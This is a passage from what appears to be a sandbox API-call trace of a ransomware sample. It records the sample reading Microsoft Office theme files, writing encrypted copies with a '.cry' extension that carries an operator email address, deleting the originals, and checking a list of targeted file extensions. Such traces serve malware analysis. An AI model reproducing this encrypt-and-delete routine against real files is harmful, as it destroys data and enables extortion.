dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0045.499] GetLastError () returned 0x0 [0045.499] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x9ac, lpOverlapped=0x0) returned 1 [0045.500] WriteFile (in: hFile=0x164, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x9b0, lpOverlapped=0x0) returned 1 [0045.501] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.501] WriteFile (in: hFile=0x164, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.501] SetEndOfFile (hFile=0x164) returned 1 [0045.501] CloseHandle (hObject=0x164) returned 1 [0045.501] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.501] SetEndOfFile (hFile=0x190) returned 1 [0045.502] CloseHandle (hObject=0x190) returned 1 [0045.502] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.502] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif")) returned 1 [0045.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.503] lstrlenW (lpString=".doc") returned 4 [0045.503] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.503] lstrlenW (lpString=".docx") returned 5 [0045.503] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.503] lstrlenW (lpString=".pdf") returned 4 [0045.503] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.503] lstrlenW (lpString=".xls") returned 4 [0045.503] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.503] lstrlenW (lpString=".xlsx") returned 5 [0045.503] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.503] lstrlenW (lpString=".ppt") returned 4 [0045.503] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.503] lstrlenW (lpString=".zip") returned 4 [0045.503] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.503] lstrlenW (lpString=".rar") returned 4 [0045.503] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.503] lstrlenW (lpString=".bz2") returned 4 [0045.503] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.503] lstrlenW (lpString=".7z") returned 3 [0045.503] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.503] lstrlenW (lpString=".dbf") returned 4 [0045.504] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.504] lstrlenW (lpString=".1cd") returned 4 [0045.504] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.504] lstrlenW (lpString=".jpg") returned 4 [0045.504] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.504] lstrlenW (lpString=".doc") returned 4 [0045.504] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.504] lstrlenW (lpString=".docx") returned 5 [0045.504] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.504] lstrlenW (lpString=".pdf") returned 4 [0045.504] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.504] lstrlenW (lpString=".xls") returned 4 [0045.504] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.504] lstrlenW (lpString=".xlsx") returned 5 [0045.504] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.504] lstrlenW (lpString=".ppt") returned 4 [0045.504] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.504] lstrlenW (lpString=".zip") returned 4 [0045.504] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.504] lstrlenW (lpString=".rar") returned 4 [0045.504] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.504] lstrlenW (lpString=".bz2") returned 4 [0045.504] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.504] lstrlenW (lpString=".7z") returned 3 [0045.504] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.504] lstrlenW (lpString=".dbf") returned 4 [0045.504] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.504] lstrlenW (lpString=".1cd") returned 4 [0045.504] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0045.505] lstrlenW (lpString=".jpg") returned 4 [0045.505] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.505] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0045.505] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.505] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.505] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=19485) returned 1 [0045.505] CloseHandle (hObject=0x190) returned 1 [0045.505] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png")) returned 0x20 [0045.505] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.505] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.506] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.506] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.506] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0045.506] GetLastError () returned 0x0 [0045.506] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x4c1d, lpOverlapped=0x0) returned 1 [0045.507] WriteFile (in: hFile=0x164, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x4c20, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x4c20, lpOverlapped=0x0) returned 1 [0045.508] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.508] WriteFile (in: hFile=0x164, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.509] SetEndOfFile (hFile=0x164) returned 1 [0045.509] CloseHandle (hObject=0x164) returned 1 [0045.509] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.509] SetEndOfFile (hFile=0x190) returned 1 [0045.510] CloseHandle (hObject=0x190) returned 1 [0045.510] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.510] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png")) returned 1 [0045.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.510] lstrlenW (lpString=".doc") returned 4 [0045.510] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.510] lstrlenW (lpString=".docx") returned 5 [0045.510] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.510] lstrlenW (lpString=".pdf") returned 4 [0045.510] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.510] lstrlenW (lpString=".xls") returned 4 [0045.510] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.510] lstrlenW (lpString=".xlsx") returned 5 [0045.510] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.510] lstrlenW (lpString=".ppt") returned 4 [0045.510] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.510] lstrlenW (lpString=".zip") returned 4 [0045.510] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.510] lstrlenW (lpString=".rar") returned 4 [0045.510] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.510] lstrlenW (lpString=".bz2") returned 4 [0045.511] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.511] lstrlenW (lpString=".7z") returned 3 [0045.511] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.511] lstrlenW (lpString=".dbf") returned 4 [0045.511] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.511] lstrlenW (lpString=".1cd") returned 4 [0045.511] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.511] lstrlenW (lpString=".jpg") returned 4 [0045.511] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.511] lstrlenW (lpString=".doc") returned 4 [0045.511] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.511] lstrlenW (lpString=".docx") returned 5 [0045.511] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.511] lstrlenW (lpString=".pdf") returned 4 [0045.511] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.511] lstrlenW (lpString=".xls") returned 4 [0045.511] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.511] lstrlenW (lpString=".xlsx") returned 5 [0045.511] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.511] lstrlenW (lpString=".ppt") returned 4 [0045.511] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.511] lstrlenW (lpString=".zip") returned 4 [0045.511] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.511] lstrlenW (lpString=".rar") returned 4 [0045.511] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.511] lstrlenW (lpString=".bz2") returned 4 [0045.511] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.511] lstrlenW (lpString=".7z") returned 3 [0045.511] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.511] lstrlenW (lpString=".dbf") returned 4 [0045.512] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.512] lstrlenW (lpString=".1cd") returned 4 [0045.512] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0045.512] lstrlenW (lpString=".jpg") returned 4 [0045.512] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.512] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0045.512] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.512] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.513] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=1232) returned 1 [0045.513] CloseHandle (hObject=0x190) returned 1 [0045.513] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif")) returned 0x20 [0045.513] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.513] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.513] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.513] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.513] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0045.526] GetLastError () returned 0x0 [0045.526] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x4d0, lpOverlapped=0x0) returned 1 [0045.545] WriteFile (in: hFile=0x16c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x4e0, lpOverlapped=0x0) returned 1 [0045.546] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.546] WriteFile (in: hFile=0x16c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.546] SetEndOfFile (hFile=0x16c) returned 1 [0045.546] CloseHandle (hObject=0x16c) returned 1 [0045.546] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.546] SetEndOfFile (hFile=0x190) returned 1 [0045.547] CloseHandle (hObject=0x190) returned 1 [0045.547] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.547] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif")) returned 1 [0045.547] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0045.547] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0045.547] lstrlenW (lpString=".doc") returned 4 [0045.547] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.547] lstrlenW (lpString=".docx") returned 5 [0045.547] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.547] lstrlenW (lpString=".pdf") returned 4 [0045.547] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.547] lstrlenW (lpString=".xls") returned 4 [0045.547] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.547] lstrlenW (lpString=".xlsx") returned 5 [0045.547] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.547] lstrlenW (lpString=".ppt") returned 4 [0045.547] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.547] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0045.547] lstrlenW (lpString=".zip") returned 4 [0045.547] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.548] lstrlenW (lpString=".rar") returned 4 [0045.548] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.548] lstrlenW (lpString=".bz2") returned 4 [0045.548] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.548] lstrlenW (lpString=".7z") returned 3 [0045.548] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.548] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0045.548] lstrlenW (lpString=".dbf") returned 4 [0045.548] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.548] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0045.548] lstrlenW (lpString=".1cd") returned 4 [0045.548] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.548] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0045.548] lstrlenW (lpString=".jpg") returned 4 [0045.548] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.548] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0045.548] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0045.548] lstrlenW (lpString=".doc") returned 4 [0045.548] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.548] lstrlenW (lpString=".docx") returned 5 [0045.548] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.548] lstrlenW (lpString=".pdf") returned 4 [0045.548] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.548] lstrlenW (lpString=".xls") returned 4 [0045.548] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.548] lstrlenW (lpString=".xlsx") returned 5 [0045.548] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.548] lstrlenW (lpString=".ppt") returned 4 [0045.548] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.548] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0045.548] lstrlenW (lpString=".zip") returned 4 [0045.548] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.548] lstrlenW (lpString=".rar") returned 4 [0045.548] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.548] lstrlenW (lpString=".bz2") returned 4 [0045.548] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.548] lstrlenW (lpString=".7z") returned 3 [0045.548] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0045.549] lstrlenW (lpString=".dbf") returned 4 [0045.549] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0045.549] lstrlenW (lpString=".1cd") returned 4 [0045.549] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0045.549] lstrlenW (lpString=".jpg") returned 4 [0045.549] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.549] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0045.549] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.549] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.549] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=18413) returned 1 [0045.549] CloseHandle (hObject=0x190) returned 1 [0045.549] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png")) returned 0x20 [0045.549] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.549] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.550] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.550] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.550] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0045.550] GetLastError () returned 0x0 [0045.550] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, 